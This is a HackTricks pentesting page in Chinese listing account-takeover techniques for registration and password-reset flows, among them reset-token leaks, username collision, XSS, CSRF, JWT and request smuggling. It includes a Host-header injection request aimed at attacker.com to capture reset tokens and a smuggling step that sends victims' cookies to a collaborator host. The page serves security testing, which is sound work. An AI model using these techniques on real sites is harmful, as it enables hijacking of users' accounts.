search

Registration & Takeover Vulnerabilities

chevron-right从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)arrow-up-righthashtag

支持HackTricks的其他方式:

hashtag
WhiteIntelarrow-up-right

WhiteIntelarrow-up-right 是一个由暗网支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到窃取恶意软件侵害

WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户接管和勒索软件攻击。

您可以在以下网址检查他们的网站并尝试他们的引擎:

LogoAdvanced Dark web Monitoring and Threat Intelligence Platformwhiteintel.iochevron-right

hashtag
注册接管

hashtag
重复注册

  • 尝试使用现有用户名生成

  • 检查变化的电子邮件:

hashtag
用户名枚举

检查是否可以确定应用程序中是否已经注册了用户名。

hashtag
密码策略

创建用户时检查密码策略(检查是否可以使用弱密码)。 在这种情况下,您可以尝试暴力破解凭据。

hashtag
SQL注入

查看此页面以了解如何尝试通过SQL注入在注册表单中进行账户接管或提取信息。

hashtag
Oauth接管

OAuth to Account takeoverchevron-right

hashtag
SAML漏洞

SAML Attackschevron-right

hashtag
更改电子邮件

注册后尝试更改电子邮件并检查此更改是否被正确验证或是否可以更改为任意电子邮件。

hashtag
更多检查

  • 检查是否可以使用一次性电子邮件

  • 密码(>200)会导致DoS

  • 检查账户创建的速率限制

  • 使用username@burp_collab.net并分析回调

hashtag
密码重置接管

hashtag
通过引用者泄漏密码重置令牌

  1. 请求将密码重置到您的电子邮件地址

  2. 单击密码重置链接

  3. 不更改密码

  4. 单击任何第三方网站(例如:Facebook,Twitter)

  5. 拦截Burp Suite代理中的请求

  6. 检查引用者标头是否泄漏密码重置令牌。

hashtag
密码重置操纵

  1. 在Burp Suite中拦截密码重置请求

  2. 在Burp Suite中添加或编辑以下标头:Host: attacker.comX-Forwarded-Host: attacker.com

  3. 使用修改后的标头转发请求 http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com

  4. 查找基于_host header_的密码重置URL,例如:https://attacker.com/reset-password.php?token=TOKEN

hashtag
通过电子邮件参数进行密码重置

hashtag
API参数上的IDOR

  1. 攻击者必须使用他们的帐户登录并转到更改密码功能。

  2. 启动Burp Suite并拦截请求。

  3. 将其发送到重复器选项卡并编辑参数:用户ID/电子邮件 powershell POST /api/changepass [...] ("form": {"email":"[email protected]","password":"securepwd"})

hashtag
弱密码重置令牌

密码重置令牌应该是随机生成的,并且每次都是唯一的。 尝试确定令牌是否过期或是否始终相同,在某些情况下,生成算法可能较弱且可被猜测。以下变量可能被算法使用。

  • 时间戳

  • 用户ID

  • 用户电子邮件

  • 名字和姓氏

  • 出生日期

  • 加密学

  • 仅数字

  • 小令牌序列(字符在[A-Z,a-z,0-9]之间)

  • 令牌重用

  • 令牌过期日期

hashtag
泄露密码重置令牌

  1. 使用API/UI触发特定电子邮件的密码重置请求,例如:[email protected]

  2. 检查服务器响应并查找resetToken

  3. 然后在URL中使用令牌,如https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

hashtag
通过用户名冲突进行密码重置

  1. 使用与受害者用户名相同但在用户名之前和/或之后插入空格的用户名在系统上注册,例如:"admin "

  2. 使用您恶意的用户名请求重置密码。

  3. 使用发送到您电子邮件的令牌重置受害者密码。

  4. 使用新密码连接到受害者帐户。

平台CTFd容易受到此攻击的影响。 参见:CVE-2020-7245arrow-up-right

hashtag
通过跨站脚本攻击实现账户接管

  1. 在应用程序内或子域中找到XSS漏洞,如果cookie的范围限定为父域:*.domain.com

  2. 泄露当前的会话cookie

  3. 使用cookie作为用户进行身份验证

hashtag
通过HTTP请求走私实现账户接管

  1. 使用smuggler检测HTTP请求走私的类型(CL、TE、CL.TE) powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\

  2. 构造一个请求,将POST / HTTP/1.1覆盖为以下数据: GET http://something.burpcollaborator.net HTTP/1.1 X:,目的是将受害者重定向到burpcollab并窃取其cookie\

  3. 最终请求可能如下所示

hashtag
Hackerone报告利用此漏洞\

hashtag
通过CSRF接管账户

  1. 为CSRF创建有效负载,例如:“自动提交密码更改的HTML表单”

  2. 发送有效负载

hashtag
通过JWT接管账户

JSON Web Token可能用于验证用户身份。

  • 编辑JWT以更改用户ID/电子邮件

  • 检查弱JWT签名

JWT Vulnerabilities (Json Web Tokens)chevron-right

hashtag
参考资料

hashtag
WhiteIntelarrow-up-right

WhiteIntelarrow-up-right是一个由暗网推动的搜索引擎,提供免费功能,用于检查公司或其客户是否受到窃取恶意软件的影响。

WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户接管和勒索软件攻击。

您可以访问他们的网站并免费尝试他们的引擎:

LogoAdvanced Dark web Monitoring and Threat Intelligence Platformwhiteintel.iochevron-right
chevron-right从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)arrow-up-righthashtag

支持HackTricks的其他方式:

上一页Rate Limit Bypass下一页Regular expression Denial of Service - ReDoS

最后更新于